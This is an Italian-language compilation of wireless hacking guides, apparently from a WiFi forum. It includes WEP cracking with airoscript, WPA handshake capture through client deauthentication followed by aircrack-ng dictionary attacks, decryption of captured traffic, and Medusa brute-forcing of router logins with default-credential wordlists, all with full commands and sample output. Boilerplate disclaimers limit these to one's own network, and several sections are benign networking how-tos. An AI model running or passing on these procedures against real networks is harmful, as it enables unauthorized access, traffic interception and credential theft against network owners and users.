Nanostation: Creare un link Wireless Punto-Punto Usiamo due Nanostation per connettere due sedi

Oggi vi voglio illustrare come creare un link Wireless Punto-Punto (PtP) per connettere due sedi distanti tra loro con due apparati Nanostation.

Ubiquiti Nanostation

PREMESSA.

Per iniziare questa guida faccio una premessa:

Il Router ADSL ha come ip: 192.168.192.254  Continua a leggere

(In)Sicurezza delle reti wireless

Avendo da sempre un forte interesse per le tecniche di protezione e cracking dei sistemi, ultimamente la mia attenzione è stata rivolta al cracking e all’intercettazione (più decodifica, ovviamente) di dati nelle reti wireless. Nonostante i risultati che io abbia ottenuto personalmente sono ancora molto scarsi, lo ammetto, girare in internet studiando il funzionamento e le vulnerabilità delle suddette reti più tutorials ed esperimenti vari da parte di altre persone mi ha portato una certa consapevolezza di fondo e alcune conclusioni che ritengo importanti.

  1. Insicurezza delle reti wireless: cominciamo con lo sfatare un mito: se siete a rischio sniffing (cioè intercettazione dei vostri pacchetti – i “dialoghi” tra computer e router) non sarete potenzialmente mai al sicuro, con nessuna delle chiavi odierne (WEP/WPA/WPA2 ecc). D’altronde è sempre stato così: un malintenzionato che ha accesso “fisico” al macchinario, prima o poi riuscirà ad avere la meglio, e questo è un paradigma fondamentale nelle tecniche di protezione dei sistemi. Seppure l’intercettazione dei pacchetti non sia un meccanismo propriamente fisico, state pur tranquilli che la correlazione “fisico”-”immateriale” in questo caso funziona alla grande.
  2. Insicurezza dei protocolli di trasmissione delle informazioni: vi porto un esempio semplicissimo: quando fate login a WordPress (la piattaforma a cui mi appoggio io per questo blog) le vostre informazioni personali (username e password) sono inviate in chiaro al server. Detto in parole povere: se qualcuno dispone della vostra chiave di rete e fa sniffing sui vostri pacchetti, ha potenziale accesso al servizio a vostro nome. E così è anche per le conversazioni di MSN, per esempio (da sempre uno dei protocolli più insicuri).
  3. Possibilità di decodifica totale dei pacchetti di traffico: Sembra paradossale pensare che chiunque abbia accesso alla vostra rete (cioè è in possesso della vostra chiave), ha la possibilità di decodificare tutti i pacchetti in viaggio nella rete. Cioè se A e B condividono la stessa rete, condividono anche le stesse codifiche: dunque A può sniffare il traffico di B e leggerlo senza problemi. Una violazione della privacy a cui sottostiamo senza neppure farci caso (o saperlo). E quando parlo di “leggere il traffico in chiaro” intendo proprio “leggere i siti visitati e i dati inviati, conversazioni comprese, senza l’utilizzo di particolari strumenti”. Sono ben pochi infatti i siti che richiedono codifiche ulteriori dei dati inviati (Yahoo! per esempio utilizza una codifica MD5).

Inutile dire che la sicurezza più grande in questo caso è il buon vecchio collegamento Ethernet o USB, ultra-raccomandato quando si devono inviare dati particolarmente sensibili (come numeri di carte di credito et similari).

Ultima cosa: a venirvi in aiuto, paradossalmente, sono le schede di rete wireless installate sui computer portatili senza particolari “tweaks”: ben poche sono supportate e facilmente utilizzabili per questi scopi. Anche se, con un po’ di pazienza, qualsiasi persona può riuscirvi… ;)

Hack NetStumbler per abilitare Windows Wireless Zero – by Savy.uhf

NetStumbler è uno dei principali programmi freeware utilizzati nel campo nel Wireless.
Permette di rilevare WirelessLAN che utilizzano lo standard 802.11a/b/g.

Purtroppo quando lo installiamo sul nostro PC smette funzionare Windows Wireless Zero.
Per far si che questo non accada dobbiamo eseguire una piccola modifica al software NerStumbler 0.4.0.

Ecco come procedere:

1) Installare  NetStumbler 0.4.0

2) Come potrete vedere ora Windows Wireless Zero non funziona

www.WiFi-Ita.com

3) Installare UltraEdit-32

4) Dopo l’installazione dobbiamo attivare la visualizzazione di tutti i file nell’editor

www.WiFi-Ita.com

5) Ora con UltraEdit-32, dobbiamo aprire due file di NetStumbler 0.4.0

a) netstumblerinstaller_0_4_0.exe

Cerchiamo la stringa 000387b0h:63

www.WiFi-Ita.com

Sostituiamola con 000387b0h:61

www.WiFi-Ita.com

Salviamo

b) Netstumbler.exe

Cerchiamo la stringa 000387b0h:63

www.WiFi-Ita.com

Sostituiamola con 000387b0h:61

www.WiFi-Ita.com

Salviamo

6) Chiudiamo UltraEdit-32 e apriamo Windows Wireless Zero e “per magia” eccolo di nuovo funzionare

www.WiFi-Ita.com

NOTA: a questo punto possiamo anche disinstallare il programma UltraEdit-32.

Buon lavoro e buon divertimento!

CIAO!!!
Savy.uhf

WEP Decript con Airoscript sulla BackTrack 3

Con questo sistema (scritto per noi da Fabio82) riusciremo a decriptare una chiave wep senza dover digitare nessuna riga di comando. (con l’eccezione delle prime che serviranno a lanciare il programma ed attivare la scheda)

INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E’ UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E’ DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la NORMATIVA sul Wireless.

Il programma è stato testato emulando la btk su VMWare con l’asus wl-167g e ha fornito una chiave di rete in meno di mezz’ora. Very Happy

MATERIALE OCCORRENTE:

-Back|Track 3.0; maggiori info [QUI]

-Una scheda di rete che supporti i vari tipi di attacchi

Fortunatamente questo software funziona anche con Chipset Ralink, per cui se volete sfruttare questa possibilità e aggiornare il tutto, andate nell’area download e scaricate Airoscript.sh .

Una volta avviata la BackTrack 3, non dovrete far altro che sostiure in:

usr/local/bin

il nuovo file che avete scaricato con quello presente.

E voilà, ora avrete l’ultima versione aggiornata e che supporta anche altri driver WiFi.

Nel mio caso ho utilizzato una periferica usb EDIMAX EW-7318Usg con driver Realtek utilizzando BT3. infatti tale periferica con bt3 usa i driver dell’ RT73 che permettono l’injection.


Procedura:

Apriamo la shell.
Attiviamo la nostra periferica:

Codice:
ifconfig <interfaccia> up

(nel mio caso <interfaccia> –> rausb0
facciamo partire airoscript digitando in shell:

Codice:
airoscript.sh

ok da ora in poi vi prometto niente più righe di comando, l’unica cosa da fare è premere numeri e tasto invio… il sogno di parecchia gente


A) Selezionare interfaccia wifi:
Premere il numero corrispettivo alla nostra periferica

B) Settare la periferica in monitor mode:
Premere il tasto 9 e premere invio.
Una volta attivato il monitor mode si ritornerà automaticamente al menù iniziale.

C) Scansione Access Point:
Premere il tasto 1.
Adesso vi chiedere se fare la scansione su tutti i canali o su un solo canale.
Cliccate 2 se sapete su quale canale trasmette il vostro Access Point e digitate il numero del canale e date invio. Altrimenti cliccate 1 per fare una scansione su tutti i canali.
In entrambi i casi si aprirà una finestra con airodump. Lasciatela aperta quanto basta per catturare tutte le informazioni che servono (MAC Access Point e MAC client). Quando vedrete visualizzato il vostro “target Access Point” e possibilmente, ma non necessariamente, anche il vostro “target client “ premete Ctrl + C per chiudere.
Il programma avrà memorizzato tutti i dati relativi ai mac degli Access Point e dei loro client e ritornerà nuovamente sul menù principale.

D) Selezione Access Point e client
Premere il tasto 2 per selezionare quale Access Point si vuole attaccare.
Premete il tasto relativo al vostro Access Point.
A questo punto vi chiederà di selezionare un client. Se non ci sono client premete No altrimenti premete su si e selezionatevi un cliente nella lista dei clienti associati che sia associato al vostro Access Point.
Premete Yes poi 1) ed ancora 1). Così vi mostrerà solamente i client associati al vostro Access Point. Sceglietene uno.

E) Attacco:
Tornati al nostro menù principale digitiamo il tasto 3 ed a questo punto abbiamo 2 opzioni:

-Con client (tasto 3):
questa è la soluzione più rapida. Se siete in questa situazione in 2 minuti avrete la PW!
se abbiamo selezionato precedentemente un client possiamo premere nuovamente il tasto 3 ed aspettare che vengano raccolti pacchetti a sufficienza. Arrivati a 200.000 pacchetti passiamo al punto CRACK.

-Siffing ARP & replay (tasto 1):
nel caso in cui non siamo riusciti a selezionare un client possiamo usare “il sistema della pazienza”.
premere tasto 1 e aspettiamo di catturare un ARP per replicarlo. Dovete solo aspettare. Una volta catturato il pacchetto verrà replicato ed una volta raggiunti i pacchetti andiamo al punto CRACK

F) CRACK
Una volta raccolto pacchetti a sufficienza possiamo ottenere la nostra PW semplicemente selezionando il punto 4 nel menù principale.
Qualche secondo di attesa ed ecco la vostra password apparire!

Grazie e spero di aver fatto felice qualcuno!!!

Scoprire gli IP in uso su una rete

Ora che conosciamo la chiave wep del nostro router (si fa tutto al solo scopo didattico, ricordiamocelo) ci troviamo davanti ad un altro problema: il router non ha il dhcp attivo.
Come fare a scoprire quale classe di ip usare? Lo scopriamo insieme in questa guida di
indy

Una volta usati i file *.cap per estrarre la chiave, passare gli stessi file *.cap attraverso AIRDECAP-NG, il quale genera un file *-dec.cap. questo file, aperto con wireshark vi mostrerà le informazioni desiderate.
il comando esatto è quindi

Codice:
airdecap-ng -l -e essid -b bssid -w kiave_wep_hex file.cap

il file-dec.cap che vi genera, aperto con wireshark, dovrebbe assomigliare all’immagine allegata

www.WiFi-Ita.com

nei campi source e destination ci sono gli ip di partenza e arrivo dei pacchetti. come vedete dall’immagine, dall’ip privato partono delle richieste per un ip pubblico di un noto sito web. conoscendo l’ip privato conoscete ora la classe di ip privati utilizzata in quella rete.

Questa procedura vi permette inoltre di verificare che la chiave individuata sia quella esatta: se non lo fosse, non vedreste i dati in chiaro in wireshark ed ancor prima airdecap-ng vi restituirebbe un number of decrypted wep packets pari a zero.

Anche kismet può tornare utile. Forse non tutti lo sanno ma esiste un parametro nel file di configurazione di questo programma per far conoscere a kismet le chiavi di accesso degli Access Point conosciuti.

Codice:
# Known WEP keys to decrypt, bssid,hexkey.  This is only for networks where
# the keys are already known, and it may impact throughput on slower hardware.
# Multiple wepkey lines may be used for multiple BSSIDs.
# wepkey=00:DE:AD:C0:DE:00,FEEDFACEDEADBEEF01020304050607080900
wepkey=00:0C:41:D0:58:8E,9D6F2D22673FA222AEDACCA799

ricordo che le linee che iniziano con un # sono commenti e quindi vengono ignorate. la sintassi è wepkey=BSSID,HEX_KEY

per approfondire è utile la lettura di http://nst.sourceforge.net/nst/docs/wepquest/ar01s03.html

GUIDA NetStumbler – by Savy.uhf

NetStumbler è uno dei principali programmi freeware utilizzati nel campo nel Wireless.
Permette di rilevare WirelessLAN che utilizzano lo standard 802.11a/b/g.

Le sue caratteristiche principali sono:
▪ Visualizza le impostazioni della rete;
▪ Permette di trovare zone con bassa copertura in una WLAN;
▪ Rileva altre reti che possono causare interferenza;
▪ Rileva AP non autorizzati nella zona di lavoro;
▪ Aiuta ad orientare antenne direzionali per collegamenti Wireless a lunga distanza;
▪ Permette di rilevare e tracciare gli elementi di una WLAN.

Ecco come ci appare NetStumbler:

Come possiamo vedere, abbiamo un elenco di reti con un’icona circolare.

L’icona circolare può essere vuota (la rete è libera) o contenere all’interno un lucchetto (la rete è protetta).

L’icona può anche assumere colori diversi a seconda dell’intensità del segnale:

GRIGIO: non c’è segnale;

ROSSO: segnale basso;

ARANCIO: segnale medio;

GIALLO: segnale buono;

VERDE CHIARO: segnale molto buono;

VERDE SCURO: segnale ottimo.

MAC: direzione dell’AP.

SSID: nome della rete.

Name: nome dell’AP.

Chan: indica il canale rilevato da cui sta trasmettendo il segnale Wireless.

Speed: indica la velocità in Mbps che trasmette quella rete Wireless.

Vendor: indica il nome di fabbricazione dell’AP. Non sempre è mostrato perché il database di NetStumbler non contiene tutti i dati di tutti i prodotti fabbricati.

Potete usare questa lista per vedere il nome di fabbricazione dai primi caratteri del MAC.

Type: tipo di rete.

Encryption: tipo di rete protetta. Può essere WEP o WPA.

SNR: intensità del segnale. Rapporto tra il segnale reale e le perdite di segnale.

Signal : massimo segnale rilevato.

Noise-: perdite di segnale rilevate.

SNR : massime perdite di segnale rilevate.

IP Address: indica l’IP della rete Wireless rilevata.

Latitude, Longitude, Distance: indicazione della posizione delle reti Wireless nel caso si stesse utilizzando un GPS.

First Seen: l’ora e la rete Wireless rilavata per la prima volta.

Last Seen: l’ora e la rete Wireless rilavata per l’ultima volta.

Signal: livello del segnale rilevate in dB.

Noise: perdite di segnale rilevate in dB. Non è presente su tutte le schede Wireless presenti in commercio. Quindi nel caso non lo si rilevasse, non significa che non ci sono perdite di segnale.

GRAFICO DEL SEGNALE ­– Signal / Noise (SNR)

I dati che compaiono nel grafico dipendono dalla scheda Wireless che abbiamo.

La zona di colore verde indica il livello del segnale. Più è alto il livello, migliore è il segnale.

La zona di colore rossa (se supportata dalla scheda Wireless) indica il livello acustico.

I dati che compaiono nel grafico dipendono dalla scheda Wireless che utilizziamo e naturalmente se questa è dotata di un’antenna esterna.

La zona verde indica il livello del segnale. Più è grande la sua altezza, più il è segnale migliore.

La zona rossa (se questo sostenuto dalla scheda, perché ci potrebbero essere delle schede Wi-Fi che non la rilevano) indica il livello acustico. Più è grande la sua altezza, più la perdita di segnale è grande. Lo spazio fra l’altezza della zona rossa e verde è lo SNR.

IMPOSTAZIONI NetStumbler

File

Qui trovate tutti i classici comandi di apri, salva, ecc..

La cosa interessante è il comando >>> Merge (che tradotto: significa fusione) con il quale potete fondere insieme più segnali Wireless.

Edit

Qui trovate tutti i classici comandi di copia, incolla, ecc..

View

Qui potete disporre le icone come volete.

Inoltre c’è un comando molto importante >>> options

Nella parte di sinistra possiamo specificare la ricerca del segnale Wireless ad una velocità compresa tra 0,5 secondi e 1,5 secondi. Facendo la sottrazione si ricava quindi 1 secondo.

Il valore consigliato è di 1.50 secondi.

Nella parte sinistra invece potete lasciare come predefinite (vedere immagine precedente) le seguenti opzioni.

Perché NetStumbler emetta un suono tanto più acuto quanto migliore è il rapporto segnale / rumore del segnale ricevuto, dobbiamo attivare l’apposita funzione.

Lo facciamo attraverso la linguetta MIDI: selezioniamo la voce Enable MIDI output of SNR.

Accertiamoci poi che il canale selezionato sia quello attuale in uso.

Device

Qui potete scegliere la scheda Wireless che volete far eseguire a NetStumbler.

Window

Qui potete sistemare le finestre di NetStumbler nel caso dovreste aprirne più di una.

Help

Sezione con aiuto e caratteriste del programma NetStumbler.

StumbVerter

Programma freeware che permette di rilevare le reti Wireless tramite un GPS.

MiniNetStumbler

Programma freeware per Windows CE (applicativo per i pocket PC) che permette di rilevare e analizzare WLAN 802.11a/b/g.
Ha pressoché le stesse funzioni di NetStrumbler.

Ecco alcuni esempi di come si presenta su un qualsiasi palmare (pda) che lo supporti:

Sito:

http://www.netstumbler.com

WPA crack

WPA crack PDF Stampa E-mail

Questa guida spiega come catturare i pacchetti handshake wpa/wpa2 psk per potere attivare il bruteforce dictionary attack.

INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E’ UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E’ DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la NORMATIVA sul Wireless.

Saluti da drpepprONE

A tutt’oggi l’unico modo per poter recuperare una chiave wpa/wpa2 psk è usare un  bruteforce dictionay attack, ovvero un attacco di tipo dizionario che prova in modo sequenziale tutte le password presenti in un file dizionario.Nell’attesa che venga scoperta una possibile vulnerabilità del WPA/WPA2 psk, vediamo come procedere.

Attenzione!!! Questo metodo funziona solo con wpa/wpa psk ovvero con metodo di autenticazione  pre-shared keys. Se il metodo di autenticazione è diverso da PSK non sarà possibile utilizare tale procedura:

Attenzione affinchè  sia possibile catturare gli handshake è indispensabile e necessario che la nostra scheda wireless comunichi alla stessa velocità e nella stessa modalità del router access point.
Quindi per esempio se la nostra scheda è in  “B” mode e il router/AP è in  “G” mode, non sarà possibile catturare gli handshake.
Vale lo stesso per la velocità  ad esempio  11MB, 54MB, etc.
Per scoprire quale siano  la modalità e la velocità corrette si può provare a cambiarele finchè gli handshake non vengono catturarti.
Per verificare il rate usato dal router/Ap, avviamo kismet selezionamio il nostro router e nelle info verrà anche descritto il rate con cui esso comunica.
Per cambiare il rate useremo il seguente comando:

iwconfig ath0 rate [auto,11,54 etc]

Per cambiare il transmission mode eseguiremo il comando:

iwpriv ath0 mode 2 (dove il numero indica uno fra le seguenti modalità)

Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

New Update :

Se nonostante il rate di trasmeissione dalla nostra scheda di rete sia uguale a quello dell AP e non riceviamo l’handshake wpa, proviamo a settare il rate ad 1 M. In molti casi il rate ad 1 M risolve ogni problema.
[iwconfig ath0 rate 1M]

.::Prerequisiti:.

A]Un client connesso alla rete wpa/wpa2 psk(necessario per velocizzare il processo di creazione di pacchetti handshake)

B]Una scheda di rete con chipset compatibile con il packet injection in monitor mode

C]La distribuzione live BACKTRACK 2

D]I dati della rete wpa/wpa2 psk (il Mac Address del router/il Mac Address del client connesso, il canale wifi usato dal router per comunicare)

-.-.-.-.-.-Questa guida viene usata una scheda di rete wireless con chipset Atheros che usa i driver madwifi,  che utilizzano come nome virtuale del device athX-.-.-.-.-.-

1] Avviamo la nostra interfaccia wireless in monitor mode:

Verifichiamo prima con il comando iwconfig se esitono interfacce athX e in tal caso le eliminiamo:

airmon-ng stop ath0

Interface       Chipset         Driver

wifi0           Atheros        madwifi-ng
ath0           Atheros         madwifi-ng VAP (parent: wifi0) (VAP estroyed)

Lanciamo iwconfig per verificare che non ci siano più interfacce athX attive:

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.If there are any remaining athX

Avviamo airmon-ng specificando  il canale su cui il router comunica:

airmon-ng start wifi0 9

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0           Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Per verificare che la nostra scheda sia effetivamente in monitor mode lanciamo il comando iwconfig e verifichiamo la voce “Mode”

iwconfig

lo        no wireless extensions.

wifi0     no wireless extensions.

eth0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:””  Nickname:””
Mode:Monitor  Frequency:2.452 GHz  Access Point:00:0F:B5:88:AC:82
Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3
Retry:off   RTS thr:off   Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
Tx excessive retries:0  Invalid misc:0   Missed beacon:0

2]Avviamo airodump-ng per catturare gli  authentication handshake

airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w catturawpa ath0

Dove:

-c 9 è il canale su cui il router/access point comunica

– -bssid 00:14:6C:7E:40:80  Il  MAC address del router/access point.

-w catturawpa il nome del file in cui verrano salvati i dati.

Ecco come si presenta airodump-ng:

CH  9 ][ Elapsed: 4 s ][ 2007-11-22 16:58

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  drpepperONE

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

Come vedete sopra è collegato un client.

3] Usare aireplay-ng per  deautenticare il client connesso

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Dove:

-0 è il  deauthentication mode
5  è il numero di  gruppi  di pacchetti  deauthentication da mandare
-a 00:14:6C:7E:40:80 è il  MAC address dell router/access point
-c 00:0F:B5:FD:FB:C2 è il  MAC address del  client da  deautenticare
ath0 il nome dell’interfaccia wireless

Questo è l’output del comando

“aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0”

12:55:56  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:56  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:57  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:58  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:58  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]

Una volta deautenticato il client, esso riproverà a riconnettersi producendo cosi pacchetti handshake.

4] Avviare  aircrack-ng per recuperare la  pre-shared key
Per effettuare questo passo è necessario avere un file dizionario di pasword che contenga il più grosso numero possibili di password.

aircrack-ng -w dizionario -b 00:14:6C:7E:40:80 catturawpa*.cap

Dove:

-w dizionario è il nome del file dizionario.
*.cap è il l’lenco dei file di capture che abbiamo collezzionato.

Opening catturawpa-01.cap
Opening catturawpa-02.cap
Opening catturawpa.cap
Opening catturawpa.cap
Read 1827 packets.

No valid WPA handshakes found.

In questo esempio avviando aircrack-ng non sono presenti ancora pacchetti handshake.

Qui invece vi è l’esempio in cui sono presenti handshake:

Opening catturawpa-01.cap
Opening catturawpa-02.cap
Opening catturawpa.cap
Opening catturawpa.cap
Read 1827 packets.

#  BSSID                      ESSID                     Encryption

1  00:14:6C:7E:40:80  drpepperONE              WPA (1 handshake)

Selezioniamo 1 per sceglere la rete interessata:

E qui la schermata di aicrack alla fine quando trova la nostra chiave:

Aircrack-ng 0.9

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 12345678 ]

Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Nota: Se usate la versione dev (sviluppo) di aricrack-ng e se  la password da trovare contiene o un carattere speciale o una lettera maiuscola o uno spazio, aircrack-ng versione dev non riuscirà a riconoscerla.
Quindi consiglio di usare sempre l’ultima versione stabile ove invece aircrack-ng riesce tranquillamente a trovare tutti i caratteri.
Infatti dalla definizione degli standard wpa, la password deve essere di lunghezza minima di 8 e massima 63 caratteri stampabili della tabella ASCII:
quindi una password wpa può contenere tutti i seguenti caratteri:

Tool SPOONWPA WPA Key

Tool SPOONWPA WPA Key PDF Stampa E-mail

Con questa semplice guida illustriamo il funzionamento di un praticissimo tool per automatizzare i vari passaggi da eseguire per un efficace test sulla  protezione WPA della nostra rete.

Il programma si integra perfettamente con la Back Tack 3 sul quale è stato testato,  questi i pochi e  semplici passi per aggiungere e poterlo utilizzare.

INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E’ UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E’ DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la NORMATIVA sul Wireless.

Una piccola premessa prima di procedere:

il tool può essere aggiunto sia in BT3 su chiavetta usb e in questo caso una volta scaricato da

http://shamanvirtuel.googlepages.com/SWPA.lzm

dovete copiare il file spoonwep2.lzm dove salvate le modifiche (changes) di BT3, quindi la cartella è BT3/modules.

Nel caso vogliate usare una Live CD seguite parte della guida per inserire i changes che trovate qui:

http://www.wifi-ita.com/index.php?option=com_content&task=view&id=356&Itemid=55

Il test è stato effettuato con una BT3 su chiavetta USB utilizzando  una Scheda

Netgear WG511T PCMCIA chipset Atheros.

Una volta inserito il  tool questo  lo trovate nel menu di BT3, il percorso è:

Backtrack—>Radio Network Analysis—>80211—>ALL—>SpoonWpa.

Ecco dove inserire il file SWPA.lzm:

lmz2dir /directory dove hai messo il file/SWPA.lmz /

Procediamo….

www.WiFi-Ita.com

www.WiFi-Ita.com

www.WiFi-Ita.com

www.WiFi-Ita.com

www.WiFi-Ita.com

www.WiFi-Ita.com

MEDUSA – Password Cracker

MEDUSA – Password Cracker – PDF Stampa E-mail

Autore : Jano

MEDUSA

– E’ un veloce Password-Cracker dei più svariati protocolli di rete.
– Ne cito solo qualcuno che io prediligo in particolar modo e di uso più frequente: FTP, HTTP, IMAP, MS-SQL, SMB, POP3, SSH, RLOGIN. (per l’ elenco completo vi rimando al sito proprietario)
– Uno degli utilizzi più immediati, e che più ci interessano (almeno credo) è quello di scoprire le password della pagina di accesso ai router, siti web di posta elettronica, pagina web del web-master, protezione interna dei client connessi, ecc. ecc..ma veniamo al dunque, senza dilungarsi troppo.
– Gli utilizzatori di BackTrack non necessitano di installazione, inguanto il pacchetto, è già installato……
INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E’ UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E’ DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la NORMATIVA sul Wireless.

Installazione su SO Ubuntu ver. 8.04/8.10

Installazione su SO Ubuntu ver. 8.04/8.10

Per prima cosa, disabilitiamo i repository “Hardy Proposed” e “Backport”, questo per prevenire l’ installazione di aggiornamenti di programmi ancora in fase di sviluppo che potrebbero compromettere il regolare funzionamento del Sistema.
1) Dopo aver sistemato i repository, aggiorniamo:

Codice:
sudo apt-get update && sudo dpkg –configure -a && sudo apt-get install -f


2) Installiamo qualche pacchetto aggiuntivo, che non ci serviranno tutti nell’ immediato, ma sicuramente ne avremo bisogno in seguito per l’ installazione e l’ utilizzo di altri software che richiedono la compilazione del Kernel:

Codice:
sudo apt-get install linux-headers-$(uname -r) build-essential make patch libssl-dev


3) Installiamo Medusa:

Codice:
sudo apt-get install medusa


– Per conoscere le varie opzioni disponibili potete consultare la documentazione:

Codice:
medusa –help

– Ora possiamo fare un test sulla nostra rete wireless, presupponendo di aver dimenticato sia l’ indirizzo principale del router che la password standard di accesso:

– La prima informazione di cui necessitiamo è l’ indirizzo primario del router a cui siamo autenticati:

Codice:
route -n


– Avrete una risposta simile aquesta.

Codice:
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.0.0     0.0.0.0         255.255.255.0   U     2      0        0 wlan0
169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 wlan0
0.0.0.0         192.168.0.1     0.0.0.0         UG    0      0        0 wlan0


– A questo punto, abbiamo l’ IP principale, ovvero 192.168.0.1

– Vediamo ora come può esserci indispensabile l’ aiuto di Medusa, presumendo di aver scordato la nostra password di acceso alle impostazioni del router:

Codice:
medusa -h 192.168.0.1 -U name-router -P password-router -e ns -f -M http -v 4


(medusa -h “IPdelRouter” -U “NamesDizionario” -P “PswDizionario” -e ns -f -M “ModuloProtocollo” -v 4)

– Se il tutto è andato a buon fine, la schell, risponderà visualizzando i parametri necessari all’ accesso, ovvero il nome Utente con la relativa Password:

Codice:
Medusa v1.3 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks < <!–
var prefix = ‘ma’ + ‘il’ + ‘to’;
var path = ‘hr’ + ‘ef’ + ‘=’;
var addy17730 = ‘jmk’ + ‘@’;
addy17730 = addy17730 + ‘foofus’ + ‘.’ + ‘net’;
document.write( ‘<a ‘ + path + ‘\” + prefix + ‘:’ + addy17730 + ‘\’>’ );
document.write( addy17730 );
document.write( ‘<\/a>’ );
//–>\n
// –&gt;jmk@foofus.net<!–
document.write( ‘<span style=”\” mce_style=”\”‘display: none;\’>’ );
// –>Indirizzo e-mail protetto dal bots spam , deve abilitare Javascript per vederlo <!–
document.write( ‘</’ );
document.write( ‘span>’ );
// –>
>

ACCOUNT FOUND: [http] Host: 192.168.0.1 User: user Password: user [SUCCESS]

– Esiste un altro programma, simile a questo ed altrettanto efficace, denominato Hydra, ma io personalmente prediligo questo, inoltre Medusa supporta qualche protoccolo in più.

– Certo che senza dizionari, si fà poca strada….quindi, per completezza, ho deciso di allegarVi anche due dizionari per testare il programma, seguendo esattamente i comandi e nomi postati.
Ricordate di posizionarli nella directory corretta, ossia la cartella da dove lanciate il programma, in alternativa modificate il percorso di ricerca.

– Dizionario con i nomi standar dei router:
http://www.mediafire.com/file/i2ezmziz2jm/name-router
– Dizionario con le psw standard dei router:
http://www.mediafire.com/file/nq2ygemvxhn/password-router

Sito web del progetto Medusa:
http://www.foofus.net/jmk/medusa/medusa.html

Suggerimento: non appesantite troppo i dizinari, quelli che vi ho postato, li ho già “scremati” con i nomi e password più utilizzati dai router del nostro Paese (Italia).
– Nel caso in cui il programma fallisse con i dizinionari, i più “SMANETTONI”, possono sbizzarrirsi generando le password ed inviarle da schell tramite “pipe”, inquanto Medusa accetta anche i dati inviati on the fly.

Come riavviare automaticamente un sistema linux in crash

Raramente i sistemi Gnu/Linux si bloccano in modo inesorabile ma, quelle poche volte che ciò accade, potrebbe essere utile riavviare in maniera automatica la macchina. Tale funzione è particolarmente utile per riavviare macchine remote rimaste bloccate. Per impostare questa opzione ci basterà accedere, durante la fase di boot, al nostro bootloader LiLo o Grub e passare al kernel la direttiva panic=n.
La lettera n indica il numero di secondi superati i quali il sistema verrà riavviato. Se utilizziamo programmi di monitoraggio dobbiamo impostare un numero di secondi sufficienti in modo da permettere al programma di generare dei file di log e consentirci quindi di individuare l’errore cha ha determinato il crash del nostro sistema.